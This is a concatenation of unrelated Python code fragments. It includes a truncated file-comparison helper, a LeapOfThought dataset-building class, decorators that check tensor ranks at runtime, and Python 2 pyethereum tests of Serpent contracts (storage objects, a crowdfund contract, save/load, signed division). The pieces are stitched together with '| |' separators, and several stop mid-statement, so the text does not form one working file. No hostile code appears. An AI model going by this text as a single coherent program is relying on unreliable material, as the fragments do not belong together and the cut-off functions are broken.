def files_differ(path1, path2):
if os.stat(path1).st_size != os.stat(path2).st_size:
return True
f1 = open(path1, "rb")
f2 = open(path2, "rb")
with f1, f2:
while True:
buf1 = f1.read(1024)
buf2 = f2.read(1024)
if buf1 != | |
import random
import _jsonnet, json
import logging
import hashlib
import os
from copy import deepcopy
import pandas as pd
from tqdm import tqdm
import math
from LeapOfThought.resources.teachai_kb import TeachAIKB
from LeapOfThought.common.general import num2words1, bc
from LeapOfThought.common.data_utils import uniform_sample_by_column, pandas_multi_column_agg
# This is mainly for testing and debugging ...
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 2000)
pd.set_option('display.max_colwidth', 200)
pd.set_option("display.colheader_justify","left")
import numpy as np
from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ArtiSet():
def __init__(self, args):
random.seed(17)
np.random.seed(1234)
self._np_seed = np.random.RandomState(17)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), args.config_path) ,'r') as f:
self._config = json.load(f)[self.artiset_name]
if args.__contains__('variant') and len(args.variant) > 0:
self._output_file = args.output_file.replace('.jsonl','_' + args.variant + '.jsonl')
if len(args.experiment_version) > 0:
self._output_file = self._output_file.replace('.jsonl', '_' + args.experiment_version + '.jsonl')
else:
self._output_file = args.output_file
self._split = args.split_by_field
self._incorrect_beliefs = None
if "incorrect_beliefs_file" in args and args.incorrect_beliefs_file:
with open(args.incorrect_beliefs_file, 'r') as file:
self._incorrect_beliefs = [json.loads(line.strip()) for line in file]
self._save_sample = args.save_sample
self.artiset_data = []
def append_teachyourai_format_example(self, example, do_print=False, append_to_list=None):
"""append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
(that must contain a "phrase", "answer") and converts it to a BooleanQA format
Args:
example (dict): an example containing question,answer,dist1,dist2 fields
do_print (bool): just for debuging
num_choices (int): number of choices in question (between 2 and 5)
append_to_list (list): a
Returns:
"""
if 'context' not in example:
example['context'] = ''
if 'id' not in example:
example['id'] = self.create_qid(example)
if do_print:
print('a:%s d1:%s d2:%s || Q:%s' % (example['phrase'], example['answer']))
if append_to_list is not None:
append_to_list.append(example)
else:
self.artiset_data.append(example)
@staticmethod
def create_qid(example):
m = hashlib.md5()
m.update(example['phrase'].encode())
m.update(example['context'].encode())
# boolean examples have binary answer (int 0 or 1)
m.update(str(example['answer']).encode())
return m.hexdigest()
def split_by_columns(self):
split_columns = self._split.split(',')
examples = self.examples_meta
indexes = {}
# check the split columns are in the data
if len(set(split_columns) - set(examples.columns)) != 0:
raise (ValueError("split columns used to split dev/test and train set do not exist the examples_meta!"))
all_objs = []
for split_column in split_columns:
all_objs += list(examples[split_column])
#best_train_inds, best_dev_inds, best_test_inds = [], [], []
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
if len(split_columns) > 1:
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
dev_test_examples = examples.iloc[test_inds + dev_inds]
dev_test_objs = []
for split_column in split_columns:
dev_test_objs += list(dev_test_examples[split_column])
dev_test_objs = pd.Series(list(set(dev_test_objs)))
else:
# We'll choice the test-dev examples from values of split that have the lowest number of examples.
# this will insure we are choosing to highest amount of training examples that are still disjoint on split_columns[0] from dev+test
split_columns_value_counts = examples[split_columns[0]].value_counts().sort_values().cumsum().reset_index()
start_ind = split_columns_value_counts[split_columns_value_counts[split_columns[0]] > \
sum(self._config['test_dev_size'])].index[0] + 1
dev_test_objs = list(split_columns_value_counts['index'][0:start_ind])
dev_test_examples = examples[examples[split_columns[0]].isin(dev_test_objs)]
inds = list(dev_test_examples.index)
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
for split_column in split_columns:
indexes[split_column] = examples.set_index(split_column)
dev_ids = set()
not_in_train_ids = set()
for split_column in split_columns:
dev_ids = dev_ids & set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
not_in_train_ids = not_in_train_ids | set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
train_examples = examples.loc[~examples['qid'].isin(not_in_train_ids), :]
train_inds = list(train_examples.index)
if len(train_inds) > self._config['max_number_of_examples']:
train_inds = train_inds[0:self._config['max_number_of_examples']]
random.shuffle(train_inds)
print("total dev-test examples available: %d" % (len(dev_test_examples)))
print("split produced %d training examples" % (len(train_inds)))
return train_inds, dev_inds, test_inds
def save_dataset(self):
"""save_dataset() automatically saves the artiset
if the config output_file contains the string _sample.jsonl it will be saved in a more readable format
otherwise it will split the examples in self.artiset_data into train, dev, test and save them in s3
if output_file startswith s3:// otherwise locally. (If output_file is empty, it will not save)
Args:
arg1 (int): Description of arg1
arg2 (str): Description of arg2
Returns:
bool: Description of return value
"""
# Move non-required columns to metadata:
artiset_data_with_metadata = []
for example in self.artiset_data:
if 'metadata' not in example:
new_example = {'metadata':{}}
else:
new_example = {'metadata': example['metadata']}
new_example.update({k:example[k] for k in ['id', 'phrase', 'context', 'answer']})
new_example['metadata'].update({k: example[k] for k in set(example.keys()) - {'id', 'phrase', 'context', 'answer','metadata'}})
artiset_data_with_metadata.append(new_example)
self.artiset_data = artiset_data_with_metadata
# splitting
if len(self._split) > 0:
train_inds, dev_inds, test_inds = self.split_by_columns()
elif 'split' in self.examples_meta:
test_inds = list(self.examples_meta[self.examples_meta['split'] == 'test'].index)
dev_inds = list(self.examples_meta[self.examples_meta['split'] == 'dev'].index)
train_inds = list(self.examples_meta[self.examples_meta['split'] == 'train'].index)
random.seed(17)
random.shuffle(train_inds)
#random.shuffle(test_inds)
#random.shuffle(dev_inds)
test_inds = test_inds[0: self._config['test_dev_size'][0]]
dev_inds = dev_inds[0:self._config['test_dev_size'][1]]
train_inds = train_inds[0:self._config['max_number_of_examples']]
else:
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
test_inds = inds[0:self._config['test_dev_size'][0]]
dev_inds = inds[self._config['test_dev_size'][0]:sum(self._config['test_dev_size'])]
train_inds = inds[sum(self._config['test_dev_size']):]
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
if self._save_sample:
if 'split' in self.examples_meta.columns:
logger.info(f"size of each split:\n{self.examples_meta['split'].value_counts()}")
random.seed(17)
if len(self.artiset_data) > 100:
self.artiset_data = random.sample(self.artiset_data,100)
save_func(self._output_file, self.artiset_data, sample_indent=self._save_sample)
else:
logger.info('uploading %d,%d,%d test,dev,train examples' % (len(test_inds),len(dev_inds),len(train_inds)))
save_func(self._output_file.replace('.jsonl', '_test.jsonl'), [self.artiset_data[i] for i in test_inds])
save_func(self._output_file.replace('.jsonl', '_dev.jsonl'), [self.artiset_data[i] for i in dev_inds])
save_func(self._output_file.replace('.jsonl', '_train.jsonl'), [self.artiset_data[i] for i in train_inds])
if len(self.examples_meta) > 0:
save_func(self._output_file.replace('.jsonl', '_meta.jsonl'), self.examples_meta.to_dict(orient='rows'))
return train_inds, dev_inds, test_inds
def save_single_split(self, split_data, split):
inds = [i for i in range(len(split_data))]
random.seed(17)
random.shuffle(inds)
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = self._output_file.find('_sample') > -1
save_func(self._output_file.replace('.jsonl', '_' + split + '.jsonl'), [split_data[i] for i in inds], sample_indent=si)
def save_aux_data(self, output_file, data):
if output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(output_file) and len(output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = output_file.find('_sample') > -1
save_func(output_file, data, sample_indent=si)
def build_artificial_dataset(self,args):
pass
def resplit(self, args):
logger.error('Not implemented for this artiset')
def build_statement_rule_property_examples(self, examples, split, statement_tag='statement', ablate_same_distractor_fields = 1.0,\
rule_tags=['implicit_rule','property'], distractor_tags = ['distractors'], ablation_list=[], use_shorthand=False, \
nlg_sampling=False, reverse_validity_frac=0):
# computing ID before ablations on the statement and rule tags:
for i, example in enumerate(examples):
m = hashlib.md5()
# note that the tags for ID creation are always the same!
for tag in [statement_tag] + rule_tags:
if tag in example:
if type(example[tag]) == list:
for e in example[tag]:
m.update(e['subject'].encode())
m.update(e['predicate'].encode())
m.update(e['object'].encode())
m.update(e['validity'].encode())
else:
m.update(example[tag]['subject'].encode())
m.update(example[tag]['predicate'].encode())
m.update(example[tag]['object'].encode())
m.update(example[tag]['validity'].encode())
example['id'] = m.hexdigest()
# Ablations
# now that all the examples are ready, we can ablate as needed:
random.seed(17)
for ablation in ablation_list:
if len(ablation) == 3:
fields, fraction, condition = ablation
examples_cands = [e for e in examples if e[condition[0]] in condition[1]]
else:
fields, fraction = ablation
examples_cands = examples
example_to_ablate = random.sample(examples_cands, int(fraction * float(len(examples))))
for e in example_to_ablate:
for field in fields:
if field in e:
del e[field]
# for every field we ablate we must ablate the same field from distractors!
if random.random() < ablate_same_distractor_fields:
for distractor_tag in distractor_tags:
if distractor_tag in e:
if field in e[distractor_tag]:
del e[distractor_tag][field]
random.seed(17)
for i, example in enumerate(examples):
context_rules = []
# adding actual rules
for rule_tag in rule_tags:
if rule_tag in example:
rules = example[rule_tag]
if not type(rules) == list:
rules = [rules]
for rule in rules:
reverse_validity = not rule['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(rule,
is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand, nlg_sampling=nlg_sampling))
# adding distractors
for rule_tag in distractor_tags:
if rule_tag in example:
for field, tag_distractors in example[rule_tag].items():
for rule in tag_distractors:
rule_list = rule
if not type(rule_list) == list:
rule_list = [rule_list]
for r in rule_list:
reverse_validity = not r['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(r, is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand,
nlg_sampling=nlg_sampling))
use_hypothetical_statement = False
if 'is_hypothetical_statement' in example and example['is_hypothetical_statement']:
use_hypothetical_statement = True
answer = 1 if example[statement_tag]['validity'] == 'always true' else 0
if self.variant != 'statement_subject_lang_selectivity':
if random.random() < reverse_validity_frac:
answer = 1 - answer
reverse_validity = True
else:
reverse_validity = False
phrase = TeachAIKB().to_pseudo_language(example[statement_tag], is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling, reverse_validity=reverse_validity)
else:
statement_dict = deepcopy(example[statement_tag])
statement_dict['subject'] = random.sample(['foo','blah','ya','qux','aranglopa','foltopia','cakophon','baz','garply'], 1)[0]
phrase = TeachAIKB().to_pseudo_language(statement_dict, is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling)
# creating a unique set of rules that does not include the statement.
context_rules = list(set(context_rules))
# set order is random!! so we need to fix the order the get a replicable order.
context_rules = sorted(context_rules)
random.shuffle(context_rules)
example.update({'phrase': phrase, \
'answer': answer,
'context': ' '.join(context_rules),
'split': split,
'rules': context_rules})
# append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
# (that must contain a "phrase", "answer") and converts it to a BooleanQA format
self.append_teachyourai_format_example(example, do_print=False)
self.examples_meta.append(deepcopy(example))
def print_examples(self, sample):
random.seed(7)
example_inds = random.sample(range(len(self.artiset_data)), sample)
## Printing a sample!
for ind in example_inds:
example = self.artiset_data[ind]
if 'statement' in | |
<gh_stars>100-1000
"""Decorators for confirming shapes are correct at runtime."""
import copy
import functools
import inspect
import textwrap
import typing
from typing import Any, Dict, Mapping, Tuple, Union
import tensor_annotations.jax as tjax
import tensor_annotations.tensorflow as ttf
import tree
# TODO: Replace this with something easier to maintain.
_TYPES_TO_CHECK = [
ttf.Tensor0,
ttf.Tensor1,
ttf.Tensor2,
ttf.Tensor3,
ttf.Tensor4,
ttf.Tensor5,
ttf.Tensor6,
ttf.Tensor7,
tjax.Array0,
tjax.Array1,
tjax.Array2,
tjax.Array3,
tjax.Array4,
]
def _is_tensor_type(t):
if not hasattr(t, '__origin__'):
# It's not a generic type, so can't be one of the types we care about.
return False
# If t is Tensor1[Height], then t.__origin__ == Tensor1.
if not any(t.__origin__ is generic_type
for generic_type in _TYPES_TO_CHECK):
return False
return True
def verify_runtime_ranks_of_return_and_args(func=None, *, check_trees=False):
"""Decorator that verifies ranks of arguments and return are correct.
For example, if an argument `x` is annotated as having type
`Tensor2[Height, Width]`, we verify that `len(x.shape) == 2`.
Note that nested argument and return types are not verified.
For example, if the return type is `Tuple[int, Tensor2[Height, Width]]`,
we give up and do no checks.
Args:
func: The function to decorate.
check_trees: Whether to recursively check tree-like types. If `True`, we'll
recurse through tree elements, and check any node that has a `.shape`
attribute. We support trees composed of dictionaries, tuples, and
named tuples.
Raises:
TypeError: If rank of return type or any argument is incorrect.
Returns:
Decorated function.
"""
if func is not None:
# Decorator used with no arguments.
return functools.partial(_verify_runtime_ranks_of_return_and_args,
func, check_trees)
else:
# Decorator used with `check_trees` set explicitly.
def decorator(func):
return functools.partial(_verify_runtime_ranks_of_return_and_args,
func, check_trees)
return decorator
def _verify_runtime_ranks_of_return_and_args( # pylint: disable=invalid-name
func, _check_trees, *args, **kwargs
):
"""Main implementation of verify_runtime_ranks_of_return_and_args.
Args:
func: The function to decorate.
_check_trees: Whether to check tree-like types. (Underscored to prevent
name collisions with other arguments in `args` and `kwargs`.)
*args: Positional arguments to `func`.
**kwargs: Keyword arguments to `func`.
Returns:
The return value of `func`.
"""
sig: inspect.Signature = inspect.signature(func)
# ===== Verify args. =====
bound_arguments: inspect.BoundArguments = sig.bind(*args, **kwargs)
# Do some args have default values, but the arg was not specified?
# If so, set the args to their default values.
bound_arguments.apply_defaults()
arg_value_by_name: Dict[str, Any] = bound_arguments.arguments
arg_signature_by_name: Mapping[str, inspect.Parameter] = sig.parameters
# Note: we iterate over signatures, not argument values, because some
# arguments may not have signatures.
for arg_name in arg_signature_by_name:
arg_signature = arg_signature_by_name[arg_name]
arg_value = arg_value_by_name[arg_name]
arg_type = arg_signature.annotation
if _is_tensor_type(arg_type):
_check_non_tree(func.__name__, arg_name, arg_value, arg_type)
elif _is_tree_type(arg_type):
type_tree = _tree_type_to_type_tree(arg_type)
_check_tree(func.__name__, arg_name, arg_value, type_tree)
# ===== Call function. =====
func_return_value = func(*args, **kwargs)
# ===== Verify return. =====
return_type = sig.return_annotation
if not _is_tensor_type(return_type):
return func_return_value
if not hasattr(func_return_value, 'shape'):
message = textwrap.dedent(f"""\
Function '{func.__name__}': return has type annotation '{return_type}'
but actual return type is '{type(func_return_value).__name__}'
""")
message_one_line = message.replace('\n', ' ')
raise TypeError(message_one_line)
annotated_rank = len(return_type.__args__)
actual_rank = len(func_return_value.shape)
if annotated_rank != actual_rank:
message = textwrap.dedent(f"""\
Function '{func.__name__}': return has type annotation '{return_type}'
with rank {annotated_rank}, but actual shape is
'{func_return_value.shape}' with rank {actual_rank}
""")
message_one_line = message.replace('\n', ' ')
raise TypeError(message_one_line)
return func_return_value
def _is_typed_tuple(x):
return (
hasattr(x, '__origin__')
# `Tuple` for e.g. Python 3.6, `tuple` for e.g. Python 3.9.
and x.__origin__ in (Tuple, tuple)
)
def _is_typed_dict(x):
return (
hasattr(x, '__origin__')
# `Dict` for e.g. Python 3.6, `dict` for e.g. Python 3.9.
and x.__origin__ in (Dict, dict)
)
def _is_typed_namedtuple(x):
return hasattr(x, '_fields') and (
hasattr(x, '_field_types') # Python 3.6
or hasattr(x, '__annotations__') # Python 3.9
)
def _is_tree_type(x):
return _is_typed_tuple(x) or _is_typed_dict(x) or _is_typed_namedtuple(x)
def _check_non_tree(
func_name: str,
arg_name: str,
arg_value: Any,
arg_type: Any,
):
"""Checks a non-tree argument.
Args:
func_name: The name of the function whose argument we're checking.
arg_name: The name of the argument we're checking.
arg_value: The value of the argument.
arg_type: The annotated type of the argument.
Raises:
TypeError: If the type or rank of `value_tree_subtree` is not what it's
supposed to be, according to the type from `type_tree`.
"""
if not hasattr(arg_value, 'shape'):
message = textwrap.dedent(f"""\
Function '{func_name}': argument '{arg_name}' has type
annotation '{arg_type}', but actual type is
'{type(arg_value).__name__}'.
""")
message_one_line = message.replace('\n', ' ')
raise TypeError(message_one_line)
# If arg_type is Tensor2[Height, Width],
# then arg_type.__args__ == (Height, Width).
annotated_arg_rank = len(arg_type.__args__)
actual_arg_rank = len(arg_value.shape)
if annotated_arg_rank != actual_arg_rank:
message = textwrap.dedent(f"""\
Function '{func_name}': argument '{arg_name}' has type
annotation '{arg_type}' with rank {annotated_arg_rank},
but actual shape is '{arg_value.shape}' with rank {actual_arg_rank}
""")
message_one_line = message.replace('\n', ' ')
raise TypeError(message_one_line)
def _tree_type_to_type_tree(tree_type: Any) -> Any:
"""Converts a tree-like type to a tree of the component types.
Examples:
T = Tuple[int, str]
tree_type_to_type_tree(T) == (int, str)
T2 = Dict[str, Tuple[float]]
tree_type_to_type_tree(T2) == {str: (float,)}
T3 = List[bool]
tree_type_to_type_tree(T3) == [bool]
class T3(NamedTuple):
obses: Tuple[np.ndarray]
actions: Tuple[np.ndarray]
tree_type_to_type_tree(T3) == T3(obses=(np.ndarray,), actions=(np.ndarray,))
If any of the items in the tree is unparameterised, it is not converted:
T = Tuple[List, str]
tree_type_to_type_tree(T) == (List, str)
Args:
tree_type: The tree-like type to convert.
Returns:
A tree of the component types.
Raises:
ValueError: If `tree_type` isn't a tree-like type.
"""
def convert_tuple(x):
if not _is_typed_tuple(x):
return x
# Check for unparameterised Tuple.
if (
not hasattr(x, '__args__') or # Python 3.9
x.__args__ is None or # Python 3.6
not x.__args__ # Python 3.7
):
return x
# If x is Tuple[int, str, float], x.__args__ will be (int, str, float).
args = x.__args__
# Check for Tuple[()].
if args == ((),):
return ()
return args
def convert_dict(x):
if not _is_typed_dict(x):
return x
# Check for unparameterised Dict.
if (
not hasattr(x, '__args__') or # Python 3.9
x.__args__ is None or # Python 3.6
# Python 3.7
x.__args__ == (typing.KT, typing.VT) # pytype: disable=module-attr
):
return x
# If x is Dict[str, int], then x.__args__ should be (str, int).
key_type, value_type = x.__args__
return {key_type: value_type}
def convert_named_tuple(x):
if not _is_typed_namedtuple(x):
return x
try:
# Python 3.6/3.7
args = dict(x._field_types) # pylint: disable=protected-access
except AttributeError:
# Python 3.9
args = x.__annotations__
return x(**args)
tree_of_types = tree_type
# Right now, `type_tree` doesn't even look like a tree.
# So first, we have to try and convert the top-level type to a tree,
# e.g. Tuple[Tuple[int]] -> (Tuple[int],)
for f in (convert_tuple, convert_dict, convert_named_tuple):
tree_of_types = f(tree_of_types)
if tree_of_types == tree_type:
raise ValueError('tree_type does not appear to be a tree-like type')
# Now we just have to keep converting elements of the tree until all
# elements have been converted.
prev_type_tree = copy.deepcopy(tree_of_types)
while True:
for f in (convert_tuple, convert_dict, convert_named_tuple):
tree_of_types = tree.map_structure(f, tree_of_types)
if tree_of_types == prev_type_tree:
break
prev_type_tree = tree_of_types
return tree_of_types
def _check_tree(
func_name: str,
arg_name: str,
value_tree,
type_tree,
):
"""Checks ranks in a tree-like argument.
Arguments:
func_name: The name of the function whose argument we're checking.
arg_name: The name of the argument we're checking.
value_tree: The value of the argument.
type_tree: The types of `value_tree`.
"""
tree.traverse_with_path(
functools.partial(_check_tree_traverse, func_name, arg_name, type_tree),
value_tree,
)
def _check_tree_traverse(
func_name: str,
arg_name: str,
type_tree,
path: Tuple[Union[int, str]],
value_tree_subtree,
):
"""Visits a node of `value_tree`, checking the type from `type_tree`.
Called from `_check_tree`.
Args:
func_name: The name of the function whose argument we're checking.
arg_name: The name of the argument we're checking.
type_tree: The types of `value_tree`.
path: A sequence of the branch keys we had to take to get to where we are.
For example, if `value_tree` is {'a': (10, 11)}, and if we're at the
10, then `path` would be ('a', 0).
value_tree_subtree: The subtree of `value_tree` rooted at the current
position.
Raises:
ValueError: If something goes wrong while trying to find the expected type
of the current node in `type_tree`.
TypeError: If the type or rank of `value_tree_subtree` is not what it's
supposed to be, according to the type from `type_tree`.
"""
# ===== Step 1: Find the type of this node in `type_tree`. =====
type_tree_node = type_tree
path_str = ''
for path_element in path:
if isinstance(type_tree_node, Dict):
if len(type_tree_node) != 1:
raise ValueError('Expected type tree type_tree_node to be of form '
'{key_type: value_type}, but is actually '
+ str(type_tree_node))
# If `value_tree` is `{'a': 0}`, then `type_tree` | |
self.chessboard[3][0] = 3
self.users[0].health = 100
self.users[1].x = 15
self.users[1].y = 12
self.users[1].items[2] = 9
self.users[80].health = self
self.users[80].items[3] = self
self.person.head = 555
self.person.arms[0].elbow = 556
self.person.arms[0].fingers[0] = 557
self.person.arms[0].fingers[4] = 558
self.person.legs[0] = 559
self.person.arms[1].elbow = 656
self.person.arms[1].fingers[0] = 657
self.person.arms[1].fingers[4] = 658
self.person.legs[1] = 659
self.person.legs[1] += 1000
def query_chessboard(x, y):
return(self.chessboard[x][y])
def query_stats(u):
return([self.users[u].health, self.users[u].x, self.users[u].y]:a)
def query_items(u, i):
return(self.users[u].items[i])
def query_person():
a = array(15)
a[0] = self.person.head
a[1] = self.person.arms[0].elbow
a[2] = self.person.arms[1].elbow
a[3] = self.person.legs[0]
a[4] = self.person.legs[1]
i = 0
while i < 5:
a[5 + i] = self.person.arms[0].fingers[i]
a[10 + i] = self.person.arms[1].fingers[i]
i += 1
return(a:a)
def testping(x, y):
return([self.users[80].health.testping2(x), self.users[80].items[3].testping2(y)]:a)
def testping2(x):
return(x*x)
"""
def test_storage_objects():
s = tester.state()
c = s.contract(storage_object_test_code)
s.send(tester.k0, c, 0, funid=0, abi=[])
assert [1] == s.send(tester.k0, c, 0, funid=1, abi=[0, 0])
assert [2] == s.send(tester.k0, c, 0, funid=1, abi=[0, 1])
assert [3] == s.send(tester.k0, c, 0, funid=1, abi=[3, 0])
assert [100, 0, 0] == s.send(tester.k0, c, 0, funid=2, abi=[0])
assert [0, 15, 12] == s.send(tester.k0, c, 0, funid=2, abi=[1])
assert [0] == s.send(tester.k0, c, 0, funid=3, abi=[1, 3])
assert [0] == s.send(tester.k0, c, 0, funid=3, abi=[0, 2])
assert [9] == s.send(tester.k0, c, 0, funid=3, abi=[1, 2])
assert [555, 556, 656, 559, 1659,
557, 0, 0, 0, 558,
657, 0, 0, 0, 658] == s.send(tester.k0, c, 0, funid=4, abi=[])
assert [361, 441] == s.send(tester.k0, c, 0, funid=5, abi=[19, 21])
infinite_storage_object_test_code = """
data chessboard[][8]
data users[100](health, x, y, items[])
data person(head, arms[](elbow, fingers[5]), legs[2])
def ping():
self.chessboard[0][0] = 1
self.chessboard[0][1] = 2
self.chessboard[3][0] = 3
self.users[0].health = 100
self.users[1].x = 15
self.users[1].y = 12
self.users[1].items[2] = 9
self.person.head = 555
self.person.arms[0].elbow = 556
self.person.arms[0].fingers[0] = 557
self.person.arms[0].fingers[4] = 558
self.person.legs[0] = 559
self.person.arms[1].elbow = 656
self.person.arms[1].fingers[0] = 657
self.person.arms[1].fingers[4] = 658
self.person.legs[1] = 659
def query_chessboard(x, y):
return(self.chessboard[x][y])
def query_stats(u):
return([self.users[u].health, self.users[u].x, self.users[u].y]:a)
def query_items(u, i):
return(self.users[u].items[i])
def query_person():
a = array(15)
a[0] = self.person.head
a[1] = self.person.arms[0].elbow
a[2] = self.person.arms[1].elbow
a[3] = self.person.legs[0]
a[4] = self.person.legs[1]
i = 0
while i < 5:
a[5 + i] = self.person.arms[0].fingers[i]
a[10 + i] = self.person.arms[1].fingers[i]
i += 1
return(a:a)
"""
def test_infinite_storage_objects():
s = tester.state()
c = s.contract(infinite_storage_object_test_code)
s.send(tester.k0, c, 0, funid=0, abi=[])
assert [1] == s.send(tester.k0, c, 0, funid=1, abi=[0, 0])
assert [2] == s.send(tester.k0, c, 0, funid=1, abi=[0, 1])
assert [3] == s.send(tester.k0, c, 0, funid=1, abi=[3, 0])
assert [100, 0, 0] == s.send(tester.k0, c, 0, funid=2, abi=[0])
assert [0, 15, 12] == s.send(tester.k0, c, 0, funid=2, abi=[1])
assert [0] == s.send(tester.k0, c, 0, funid=3, abi=[1, 3])
assert [0] == s.send(tester.k0, c, 0, funid=3, abi=[0, 2])
assert [9] == s.send(tester.k0, c, 0, funid=3, abi=[1, 2])
assert [555, 556, 656, 559, 659,
557, 0, 0, 0, 558,
657, 0, 0, 0, 658] == s.send(tester.k0, c, 0, funid=4, abi=[])
fail1 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0]
"""
fail2 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0].fingers
"""
fail3 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0].fingers[4][3]
"""
fail4 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms.elbow[0].fingers[4]
"""
fail5 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0].fingers[4].nail
"""
fail6 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0].elbow.skin
"""
def test_storagevar_fails():
s = tester.state()
success1, success2, success3, success4, success5, success6 = \
0, 0, 0, 0, 0, 0
try:
s.contract(fail1)
except Exception, e:
success1 = "Storage variable access not deep enough" in str(e)
assert success1, e
try:
s.contract(fail2)
except Exception, e:
success2 = "Too few array index lookups" in str(e)
assert success2, e
try:
s.contract(fail3)
except Exception, e:
success3 = "Too many array index lookups" in str(e)
assert success3, e
try:
s.contract(fail4)
except Exception, e:
success4 = "Too few array index lookups" in str(e)
assert success4, e
try:
s.contract(fail5)
except Exception, e:
success5 = "Invalid object member" in str(e)
assert success5, e
try:
s.contract(fail6)
except Exception, e:
success6 = "Invalid object member" in str(e)
assert success6, e
crowdfund_code = """
data campaigns[2^80](recipient, goal, deadline, contrib_total, contrib_count, contribs[2^50](sender, value))
def create_campaign(id, recipient, goal, timelimit):
if self.campaigns[id].recipient:
return(0)
self.campaigns[id].recipient = recipient
self.campaigns[id].goal = goal
self.campaigns[id].deadline = block.timestamp + timelimit
def contribute(id):
# Update contribution total
total_contributed = self.campaigns[id].contrib_total + msg.value
self.campaigns[id].contrib_total = total_contributed
# Record new contribution
sub_index = self.campaigns[id].contrib_count
self.campaigns[id].contribs[sub_index].sender = msg.sender
self.campaigns[id].contribs[sub_index].value = msg.value
self.campaigns[id].contrib_count = sub_index + 1
# Enough funding?
if total_contributed >= self.campaigns[id].goal:
send(self.campaigns[id].recipient, total_contributed)
self.clear(id)
return(1)
# Expired?
if block.timestamp > self.campaigns[id].deadline:
i = 0
c = self.campaigns[id].contrib_count
while i < c:
send(self.campaigns[id].contribs[i].sender, self.campaigns[id].contribs[i].value)
i += 1
self.clear(id)
return(2)
# Progress report [2, id]
def progress_report(id):
return(self.campaigns[id].contrib_total)
# Clearing function for internal use
def clear(self, id):
if self == msg.sender:
self.campaigns[id].recipient = 0
self.campaigns[id].goal = 0
self.campaigns[id].deadline = 0
c = self.campaigns[id].contrib_count
self.campaigns[id].contrib_count = 0
self.campaigns[id].contrib_total = 0
i = 0
while i < c:
self.campaigns[id].contribs[i].sender = 0
self.campaigns[id].contribs[i].value = 0
i += 1
"""
def test_crowdfund():
s = tester.state()
c = s.contract(crowdfund_code)
s.send(tester.k0, c, 0, funid=0, abi=[100, 45, 100000, 2])
s.send(tester.k0, c, 0, funid=0, abi=[200, 48, 100000, 2])
s.send(tester.k1, c, 1, funid=1, abi=[100])
assert [1] == s.send(tester.k1, c, 2, funid=2, abi=[100])
s.send(tester.k2, c, 30000, funid=1, abi=[200])
s.send(tester.k3, c, 59049, funid=1, abi=[100])
assert [59050] == s.send(tester.k1, c, 2, funid=2, abi=[100])
s.send(tester.k4, c, 70001, funid=1, abi=[200])
assert 100001 == s.block.get_balance(utils.int_to_addr(48))
mida1 = s.block.get_balance(tester.a1)
mida3 = s.block.get_balance(tester.a3)
s.mine(5)
s.send(tester.k5, c, 1, funid=1, abi=[100])
assert mida1 + 1 == s.block.get_balance(tester.a1)
assert mida3 + 59049 == s.block.get_balance(tester.a3)
saveload_code = """
data store[1000]
def kall():
a = text("sir bobalot to the rescue !!1!1!!1!1")
save(self.store[0], a, chars=60)
b = load(self.store[0], chars=60)
c = load(self.store[0], chars=33)
return([a[0], a[1], b[0], b[1], c[0], c[1]]:a)
"""
import bitcoin
def test_saveload():
s = tester.state()
c = s.contract(saveload_code)
o = s.send(tester.k0, c, 0, funid=0, abi=[])
assert o[0] == 0x73697220626f62616c6f7420746f207468652072657363756520212131213121, bitcoin.encode(o[0], 16)
assert o[1] == 0x2131213100000000000000000000000000000000000000000000000000000000, bitcoin.encode(o[1], 16)
assert o[2] == 0x73697220626f62616c6f7420746f207468652072657363756520212131213121, bitcoin.encode(o[2], 16)
assert o[3] == 0x2131213100000000000000000000000000000000000000000000000000000000, bitcoin.encode(o[3], 16)
assert o[4] == 0x73697220626f62616c6f7420746f207468652072657363756520212131213121, bitcoin.encode(o[4], 16)
assert o[5] == 0x2100000000000000000000000000000000000000000000000000000000000000, bitcoin.encode(o[5], 16)
sdiv_code = """
def kall():
return([2^255 / 2^253, 2^255 % 3]:a)
"""
def test_sdiv():
s = tester.state()
c = s.contract(sdiv_code)
assert [-4, -2] == s.send(tester.k0, c, 0, funid=0, abi=[])
basic_argcall_code = """
